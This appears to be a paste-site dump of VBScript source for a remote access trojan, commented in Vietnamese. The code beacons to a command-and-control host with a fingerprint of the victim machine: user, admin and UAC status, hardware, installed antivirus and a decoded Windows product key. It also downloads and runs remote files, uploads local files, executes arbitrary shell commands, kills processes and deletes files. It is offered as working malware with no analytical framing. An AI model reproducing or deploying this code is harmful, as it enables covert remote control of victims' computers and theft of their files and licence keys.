- function THANKGOD_YOUAREHERE(LENHTHUCTHI,TSO_CHO_LENHTHUCTHI)
- THANKGOD_YOUAREHERE = TSO_CHO_LENHTHUCTHI
- MANGCUATUI.open "post","http://" & DIACHI_KETNOI & ":" & CONG_KETNOI &"/" & LENHTHUCTHI,false
- MANGCUATUI.setrequestheader "user-agent:",TAPHOPINFOR_HAM
- MANGCUATUI.send TSO_CHO_LENHTHUCTHI
- THANKGOD_YOUAREHERE = MANGCUATUI.responsetext
- end function
- sub LAY_FILETHEO_URL_VA_THUCTHI_SUB(URL_CHUA_FILE,TEN_FILE_GUI_URL)
- CHUOI_LIENKET = URL_CHUA_FILE
- if not OBJ_HTHONG_TTIN.folderexists(STR_DUONGDAN_USER_TEMP & "\" & DT_FOLDER_IN_TEMP) then
- CHUOI_DATFILE_VAODAU = STR_DUONGDAN_USER_TEMP & "\" & TEN_FILE_GUI_URL
- else
- CHUOI_DATFILE_VAODAU = STR_DUONGDAN_USER_TEMP & "\" & DT_FOLDER_IN_TEMP & "\" & TEN_FILE_GUI_URL
- end if
- set OBJ_LAY_FILE_URL_VA_CHAY = createobject("msxml2.xmlhttp")
- OBJ_LAY_FILE_URL_VA_CHAY.open "get", CHUOI_LIENKET, false
- OBJ_LAY_FILE_URL_VA_CHAY.send
- set OBJ_HETHONG_TAPTIN_FILE_URL_RUN = createobject("scripting.filesystemobject")
- if OBJ_HETHONG_TAPTIN_FILE_URL_RUN.fileexists(CHUOI_DATFILE_VAODAU) then
- OBJ_HETHONG_TAPTIN_FILE_URL_RUN.deletefile(CHUOI_DATFILE_VAODAU),true
- end if
- if OBJ_LAY_FILE_URL_VA_CHAY.status = 200 then
- dim ADO_TAI_URL_CHAY
- set ADO_TAI_URL_CHAY = createobject("adodb.stream")
- with ADO_TAI_URL_CHAY
- .type = 1
- .open
- .write OBJ_LAY_FILE_URL_VA_CHAY.responsebody
- .savetofile CHUOI_DATFILE_VAODAU
- .close
- end with
- set ADO_TAI_URL_CHAY = nothing
- end if
- if OBJ_HETHONG_TAPTIN_FILE_URL_RUN.fileexists(CHUOI_DATFILE_VAODAU) then
- OBJ_WSSHELL.run OBJ_HETHONG_TAPTIN_FILE_URL_RUN.getfile(CHUOI_DATFILE_VAODAU).shortpath
- end if
- end sub
- sub DUAFILELEN_VIC_ROICHAY_SUB(URL_CHUA_FILE,THU_MUC_VIC_NHAN)
- if THU_MUC_VIC_NHAN = "" then
- if not OBJ_HTHONG_TTIN.folderexists(STR_DUONGDAN_USER_TEMP & "\" & DT_FOLDER_IN_TEMP) then
- THU_MUC_VIC_NHAN = STR_DUONGDAN_USER_TEMP & "\"
- else
- THU_MUC_VIC_NHAN = STR_DUONGDAN_USER_TEMP & "\" & DT_FOLDER_IN_TEMP & "\"
- end if
- end if
- CHUOI_DATFILE_VAODAU = THU_MUC_VIC_NHAN & mid(URL_CHUA_FILE, instrrev(URL_CHUA_FILE,"\") + 1)
- set OBJ_DUAFILELEN_VIC_VA_CHAY = createobject("msxml2.xmlhttp")
- OBJ_DUAFILELEN_VIC_VA_CHAY.open "post","http://" & DIACHI_KETNOI & ":" & CONG_KETNOI &"/" & "is-sending" & MK & URL_CHUA_FILE, false
- OBJ_DUAFILELEN_VIC_VA_CHAY.send ""
- set OBJ_HETHONG_TAPTIN_DUAFILELEN_VA_RUN = createobject("scripting.filesystemobject")
- if OBJ_HETHONG_TAPTIN_DUAFILELEN_VA_RUN.fileexists(CHUOI_DATFILE_VAODAU) then
- OBJ_HETHONG_TAPTIN_DUAFILELEN_VA_RUN.deletefile(CHUOI_DATFILE_VAODAU),true
- end if
- if OBJ_DUAFILELEN_VIC_VA_CHAY.status = 200 then
- dim ADO_TAI_DISKFILE_LEN_VA_CHAY
- set ADO_TAI_DISKFILE_LEN_VA_CHAY = createobject("adodb.stream")
- with ADO_TAI_DISKFILE_LEN_VA_CHAY
- .type = 1
- .open
- .write OBJ_DUAFILELEN_VIC_VA_CHAY.responsebody
- .savetofile CHUOI_DATFILE_VAODAU
- .close
- end with
- set ADO_TAI_DISKFILE_LEN_VA_CHAY = nothing
- end if
- if OBJ_HETHONG_TAPTIN_DUAFILELEN_VA_RUN.fileexists(CHUOI_DATFILE_VAODAU) then
- OBJ_WSSHELL.run OBJ_HETHONG_TAPTIN_DUAFILELEN_VA_RUN.getfile(CHUOI_DATFILE_VAODAU).shortpath
- end if
- end sub
- function LAY_FILE_VENHA_FILEMAN_HAM(URL_CHUA_FILE)
- dim MANGCUATUI,ADO_LAY_FILE_VENHA,BO_DEM_BUF_LAY_FILE_VE_NHA
- set ADO_LAY_FILE_VENHA = createobject("adodb.stream")
- with ADO_LAY_FILE_VENHA
- .type = 1
- .open
- .loadfromfile URL_CHUA_FILE
- BO_DEM_BUF_LAY_FILE_VE_NHA = .read
- .close
- end with
- set ADO_LAY_FILE_VENHA = nothing
- set MANGCUATUI = createobject("msxml2.xmlhttp")
- MANGCUATUI.open "post","http://" & DIACHI_KETNOI & ":" & CONG_KETNOI &"/" & "is-recving" & MK & URL_CHUA_FILE, false
- MANGCUATUI.send BO_DEM_BUF_LAY_FILE_VE_NHA
- end function
- function LAYCACODIA_HAM()
- for each EXTDEVS in OBJ_HTHONG_TTIN.drives
- if EXTDEVS.isready = true then LAYCACODIA_HAM = LAYCACODIA_HAM & EXTDEVS.path & "|" & EXTDEVS.drivetype & MK
- next
- end function
- function CACTHUMUC_HAM(CACTHUMUC_GET_INF)
- CACTHUMUC_HAM = CACTHUMUC_GET_INF & MK
- for each THUMUC_DACO_IN_MAY in OBJ_HTHONG_TTIN.getfolder(CACTHUMUC_GET_INF).subfolders
- CACTHUMUC_HAM = CACTHUMUC_HAM & THUMUC_DACO_IN_MAY.name & "|" & "" & "|" & "d" & "|" & THUMUC_DACO_IN_MAY.attributes & MK
- next
- for each TTIN_DACO_IN_MACHINE in OBJ_HTHONG_TTIN.getfolder(CACTHUMUC_GET_INF).files
- CACTHUMUC_HAM = CACTHUMUC_HAM & TTIN_DACO_IN_MACHINE.name & "|" & TTIN_DACO_IN_MACHINE.size & "|" & "f" & "|" & TTIN_DACO_IN_MACHINE.attributes & MK
- next
- end function
- function CACTIENTRINH_HAM()
- on error resume next
- set CACDTTHEOCOT_PROC = DT_WMG_DOT.execquery("select * from win32_process",,48)
- dim DT_PROC
- for each DT_PROC in CACDTTHEOCOT_PROC
- CACTIENTRINH_HAM = CACTIENTRINH_HAM & DT_PROC.name & "|"
- CACTIENTRINH_HAM = CACTIENTRINH_HAM & DT_PROC.processid & "|"
- CACTIENTRINH_HAM = CACTIENTRINH_HAM & DT_PROC.executablepath & MK
- next
- end function
- sub TAT_TIENTRINH_SUB(MASO_TIENTRINH)
- on error resume next
- OBJ_WSSHELL.run "taskkill /F /T /PID " & MASO_TIENTRINH,7,true
- end sub
- sub XOA_TAPTIN_VA_THUMUC_SUB(DUONGDAN_FILE_OR_THUMUC)
- on error resume next
- OBJ_HTHONG_TTIN.deletefile DUONGDAN_FILE_OR_THUMUC,true
- OBJ_HTHONG_TTIN.deletefolder DUONGDAN_FILE_OR_THUMUC,true
- end sub
- function DIEUKHIEN_CMD_HAM(LENHTHUCTHI)
- dim MANGCUATUI,OBJ_WSSHELL_EXECU,DOCDATA_SHELLOUT
- set OBJ_WSSHELL_EXECU = OBJ_WSSHELL.exec("%comspec% /c " & LENHTHUCTHI)
- if not OBJ_WSSHELL_EXECU.stdout.atendofstream then
- DOCDATA_SHELLOUT = OBJ_WSSHELL_EXECU.stdout.readall
- elseif not OBJ_WSSHELL_EXECU.stderr.atendofstream then
- DOCDATA_SHELLOUT = OBJ_WSSHELL_EXECU.stderr.readall
- else
- DOCDATA_SHELLOUT = ""
- end if
- DIEUKHIEN_CMD_HAM = DOCDATA_SHELLOUT
- end function
- function TAPHOPINFOR_HAM
- on error resume next
- dim DIGI_PROID
- DIGI_PROID = OBJ_WSSHELL.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DigitalProductId")
- if VEU = "" then
- VEU = LAY_TENVIC_THEOMAHW_HAM & MK
- VEU = VEU & OBJ_WSSHELL.expandenvironmentstrings("%computername%") & MK
- VEU = VEU & OBJ_WSSHELL.expandenvironmentstrings("%username%") & MK
- set HDH = DT_WMG_IMP.execquery("select * from win32_operatingsystem")
- for each TEN_HDH in HDH
- if not OBJ_HTHONG_TTIN.folderexists(OBJ_WSSHELL.expandenvironmentstrings("%PROGRAMFILES(x86)%")) then
- VEU = VEU & TEN_HDH.caption & " x86 SP" & TEN_HDH.ServicePackMajorVersion & MK
- else
- VEU = VEU & TEN_HDH.caption & " x64 SP" & TEN_HDH.ServicePackMajorVersion & MK
- end if
- exit for
- next
- if CHECKISADMIN_HAM = false then
- if UAC_DABAT_HAM = true then
- VEU = VEU & "Non-Admin/On/" & DNET_HAM & "/" & TENCPU_HAM & "/RAM " & MYRAM_HAM & "/" & TENGPU_HAM & "/" & CVERT_PCKEY_HAM(DIGI_PROID) & MK
- else
- VEU = VEU & "Non-Admin/Off/" & DNET_HAM & "/" & TENCPU_HAM & "/RAM " & MYRAM_HAM & "/" & TENGPU_HAM & "/" & CVERT_PCKEY_HAM(DIGI_PROID) & MK
- end if
- else
- if UAC_DABAT_HAM = true then
- VEU = VEU & "Admin/On/" & DNET_HAM & "/" & TENCPU_HAM & "/RAM " & MYRAM_HAM & "/" & TENGPU_HAM & "/" & CVERT_PCKEY_HAM(DIGI_PROID) & MK
- else
- VEU = VEU & "Admin/Off/" & DNET_HAM & "/" & TENCPU_HAM & "/RAM " & MYRAM_HAM & "/" & TENGPU_HAM & "/" & CVERT_PCKEY_HAM(DIGI_PROID) & MK
- end if
- end if
- VEU = VEU & LAY_TENTRINH_AV_HAM & MK
- VEU = VEU & COHAYKO_TU_USB
- TAPHOPINFOR_HAM = VEU
- else
- TAPHOPINFOR_HAM = VEU
- end if
- end function
- function CHECKISADMIN_HAM()
- dim LA_ADMIN
- call ADMINLOCALGROUP_HAM(LA_ADMIN)
- if LA_ADMIN = 1 then
- CHECKISADMIN_HAM = true
- else
- CHECKISADMIN_HAM = false
- end if
- set LA_ADMIN = nothing
- end function
- function ADMINLOCALGROUP_HAM(ISADMIN)
- PCNAME = "."
- set OBJ_MANG = CreateObject("WScript.Network")
- set COT_CACNHOM = GetObject("WinNT://" & PCNAME & "")
- COT_CACNHOM.Filter = Array("group")
- for each NHOM in COT_CACNHOM
- for each TVIEN in NHOM.Members
- if TVIEN.Name = OBJ_MANG.UserName then
- CACNHOM = CACNHOM & " , " & NHOM.Name
- end if
- next
- next
- for each NHOM_QUANTRI in DT_WMG_DOT.ExecQuery("SELECT * FROM Win32_Group WHERE SID = 'S-1-5-32-544'")
- TEN_NHOMQUANTRI = NHOM_QUANTRI.Name
- next
- if InStr(LCase(CACNHOM), LCase(TEN_NHOMQUANTRI)) > 0 then
- ISADMIN = 1
- end if
- set COT_CACNHOM = nothing
- end function
- function DNET_HAM
- on error resume next
- N2 = OBJ_WSSHELL.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v2.0.50727\Version")
- N4 = OBJ_WSSHELL.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full\Version")
- if (N2 <> "") and (N4 <> "") then
- if OBJ_HTHONG_TTIN.fileexists(OBJ_WSSHELL.expandenvironmentstrings("%windir%") & "\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll") then
- DNET_HAM = N4
- elseif OBJ_HTHONG_TTIN.fileexists(OBJ_WSSHELL.expandenvironmentstrings("%windir%") & "\Microsoft.NET\Framework\v2.0.50727\mscorlib.dll") then
- DNET_HAM = N2
- else
- DNET_HAM = N2 & "+" & N4
- end if
- elseif N2 <> "" then
- if OBJ_HTHONG_TTIN.fileexists(OBJ_WSSHELL.expandenvironmentstrings("%windir%") & "\Microsoft.NET\Framework\v2.0.50727\mscorlib.dll") then DNET_HAM = N2
- elseif N4 <> "" then
- if OBJ_HTHONG_TTIN.fileexists(OBJ_WSSHELL.expandenvironmentstrings("%windir%") & "\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll") then DNET_HAM = N4
- else
- DNET_HAM = "Ask Him_Her :)"
- end if
- end function
- function TENCPU_HAM()
- on error resume next
- set COT_BOVIXULY = DT_WMG_IMP.execquery("select * from Win32_Processor")
- for each DOI_TUONG_IN_BOVIXULY in COT_BOVIXULY
- TENCPU_HAM = DOI_TUONG_IN_BOVIXULY.name
- next
- end function
- function MYRAM_HAM
- on error resume next
- set COT_COMSYSTEM = DT_WMG_IMP.execquery("select * from Win32_ComputerSystem")
- SO_GB = 1024*1024*1024
- for each DOI_TUONG_IN_COMSYSTEM in COT_COMSYSTEM
- MYRAM_HAM = Round(DOI_TUONG_IN_COMSYSTEM.TotalPhysicalMemory/SO_GB,3) & "MB"
- exit for
- next
- end function
- function TENGPU_HAM()
- on error resume next
- set COT_VIDEOCONTROL = DT_WMG_DOT.execquery("Select * from Win32_VideoController",,48)
- for each DOI_TUONG_IN_VIDEOCONTROL in COT_VIDEOCONTROL
- TENGPU_HAM = DOI_TUONG_IN_VIDEOCONTROL.caption
- next
- end function
- function CVERT_PCKEY_HAM(PRODID)
- on error resume next
- const KEY_MAU = 52
- dim CACMAY_WIN8_VE_SAU,KYTU_SO,CHYM,BUOM,HIENTAI,XUAT_KEY,KEY_CUOI,KEY_MOT,CHENVAO
- CACMAY_WIN8_VE_SAU = (PRODID(66)\6) and 1
- PRODID(66) = (PRODID(66) and &HF7) Or ((CACMAY_WIN8_VE_SAU and 2)*4)
- CHYM = 24
- KYTU_SO = "BCDFGHJKMPQRTVWXY2346789"
- do
- HIENTAI = 0
- BUOM = 14
- do
- HIENTAI = HIENTAI * 256
- HIENTAI = PRODID(BUOM + KEY_MAU) + HIENTAI
- PRODID(BUOM + KEY_MAU) = (HIENTAI\24)
- HIENTAI = HIENTAI mod 24
- BUOM = BUOM - 1
- loop while BUOM >= 0
- CHYM = CHYM - 1
- XUAT_KEY = mid(KYTU_SO,HIENTAI + 1, 1) & XUAT_KEY
- KEY_CUOI = HIENTAI
- loop while CHYM >= 0
- KEY_MOT = mid(XUAT_KEY, 2, KEY_CUOI)
- CHENVAO = "N"
- XUAT_KEY = Replace(XUAT_KEY, KEY_MOT, KEY_MOT & CHENVAO, 2, 1, 0)
- if KEY_CUOI = 0 then XUAT_KEY = CHENVAO & XUAT_KEY
- CVERT_PCKEY_HAM = mid(XUAT_KEY, 1, 5) & "-" & mid(XUAT_KEY, 6, 5) & "-" & mid(XUAT_KEY, 11, 5) & "-" & mid(XUAT_KEY, 16, 5) & "-" & mid(XUAT_KEY, 21, 5)
- end function
- function MAHW_HAM
- on error resume next
- set CAC_HDD = DT_WMG_IMP.execquery("select * from win32_logicaldisk")
- for each ODIACUNG_SSD in CAC_HDD
- if ODIACUNG_SSD.volumeserialnumber <> "" then
- MAHW_HAM = Trim(ODIACUNG_SSD.volumeserialnumber) & "_"
- exit for
- end if
- next
- end function
- function LAY_TENVIC_THEOMAHW_HAM
- on error resume next
- set CAC_HDD = DT_WMG_IMP.execquery("select * from win32_logicaldisk")
- for each ODIACUNG_SSD in CAC_HDD
- if ODIACUNG_SSD.volumeserialnumber <> "" then
- if DT_ID_CHO_PC = "" Or DT_ID_CHO_PC = " " then
- LAY_TENVIC_THEOMAHW_HAM = Trim(ODIACUNG_SSD.volumeserialnumber) & "_v0416"
- else
- LAY_TENVIC_THEOMAHW_HAM = Trim(ODIACUNG_SSD.volumeserialnumber) & "_" & DT_ID_CHO_PC
- end if
- exit for
- end if
- next
- end function
- function LAY_TENTRINH_AV_HAM
- on error resume next
- LAY_TENTRINH_AV_HAM = ""
- set CAC_DT_THEOCOT_HDH = DT_WMG_IMP.execquery("select * from win32_operatingsystem",,48)
- for each DT_AV in CAC_DT_THEOCOT_HDH
- PHIENBAN_AV = split(DT_AV.version,".")
- next
- PHIENBAN_AV = split(CAC_DT_THEOCOT_HDH.version,".")
- PHIENBAN_HDH = PHIENBAN_AV(0) & "."
- for x = 1 to ubound(PHIENBAN_AV)
- PHIENBAN_HDH = PHIENBAN_HDH & PHIENBAN_AV(i)
- next
- PHIENBAN_HDH = eval(PHIENBAN_HDH)
- if PHIENBAN_HDH > 6 then
- TRUNGTAM_SECU = "securitycenter2"
- else
- TRUNGTAM_SECU = "securitycenter"
- end if
- set DT_TRUNGTAM_SECU = getobject("winmgmts:\\localhost\root\" & TRUNGTAM_SECU)
- set COT_AV = DT_TRUNGTAM_SECU.execquery("select * from antivirusproduct","wql",0)
- for each TEN_AV in COT_AV
- LAY_TENTRINH_AV_HAM = LAY_TENTRINH_AV_HAM & TEN_AV.displayname & ". "
- next
- if LAY_TENTRINH_AV_HAM = "" then LAY_TENTRINH_AV_HAM = "None AV"
- set DT_TRUNGTAM_SECU = nothing
- end function
- function GOBO_KYTUSAI_HAM(CHUOI_DE_SCRUB)
- dim CHUOI_DA_SCRUB
- CHUOI_DA_SCRUB = Replace(Replace(Replace(Replace(Replace(Replace(Replace(Replace(Replace(CHUOI_DE_SCRUB, "|", ""), ">", ""), "<", ""), Chr(34), ""), "?", ""), "*", ""), ":", ""), "/", ""), "\", "")
- GOBO_KYTUSAI_HAM = CHUOI_DA_SCRUB
- end function
- sub XOA_TEMP_SAU_X_NGAY_SUB(STR_DUONGDANTEMP_INSUB_AUTOX)
- on error resume next
- dim OBJ_HTHONG_TAPTIN_CHOTEMP,OBJ_DUONGDAN_FOLDER_CANCHO_TEMP,OBJ_CAC_DIR_TEMP,OBJ_CAC_FILE_TEMP,i
- set OBJ_HTHONG_TAPTIN_CHOTEMP = CreateObject("Scripting.FileSystemObject")
- set OBJ_DUONGDAN_FOLDER_CANCHO_TEMP = OBJ_HTHONG_TAPTIN_CHOTEMP.GetFolder(STR_DUONGDANTEMP_INSUB_AUTOX)
- for each OBJ_CAC_FILE_TEMP in OBJ_DUONGDAN_FOLDER_CANCHO_TEMP.Files
- if OBJ_CAC_FILE_TEMP.DateCreated < (Now() - 8) then OBJ_CAC_FILE_TEMP.delete(true)
- next
- for i = 0 to 10
- for each OBJ_CAC_DIR_TEMP in OBJ_DUONGDAN_FOLDER_CANCHO_TEMP.SubFolders
- if OBJ_CAC_DIR_TEMP.DateCreated < (Now() - 8) then OBJ_CAC_DIR_TEMP.Delete(true)
- next
- next
- set OBJ_HTHONG_TAPTIN_CHOTEMP = nothing
- set OBJ_DUONGDAN_FOLDER_CANCHO_TEMP = nothing
- set OBJ_CAC_DIR_TEMP = nothing
- set OBJ_CAC_FILE_TEMP = nothing
- end sub
- sub XOA_FILEVAFOLDER_SUB(STR_DUONGDANTEMP_INSUB)
- on error resume next
- dim OBJ_HTHONG_TAPTIN_CHOTEMP,OBJ_DUONGDAN_FOLDER_CANCHO_TEMP,OBJ_CAC_DIR_TEMP,OBJ_CAC_FILE_TEMP,i
- set OBJ_HTHONG_TAPTIN_CHOTEMP = CreateObject("Scripting.FileSystemObject")
- set OBJ_DUONGDAN_FOLDER_CANCHO_TEMP = OBJ_HTHONG_TAPTIN_CHOTEMP.GetFolder(STR_DUONGDANTEMP_INSUB)
- for each OBJ_CAC_FILE_TEMP in OBJ_DUONGDAN_FOLDER_CANCHO_TEMP.Files
- OBJ_CAC_FILE_TEMP.delete(true)
- next
- for i = 0 to 10
- for each OBJ_CAC_DIR_TEMP in OBJ_DUONGDAN_FOLDER_CANCHO_TEMP.SubFolders
- OBJ_CAC_DIR_TEMP.Delete(true)
- next
- next
- set OBJ_HTHONG_TAPTIN_CHOTEMP = nothing
- set OBJ_DUONGDAN_FOLDER_CANCHO_TEMP = nothing
- set OBJ_CAC_DIR_TEMP = nothing
- set OBJ_CAC_FILE_TEMP = nothing
- end sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement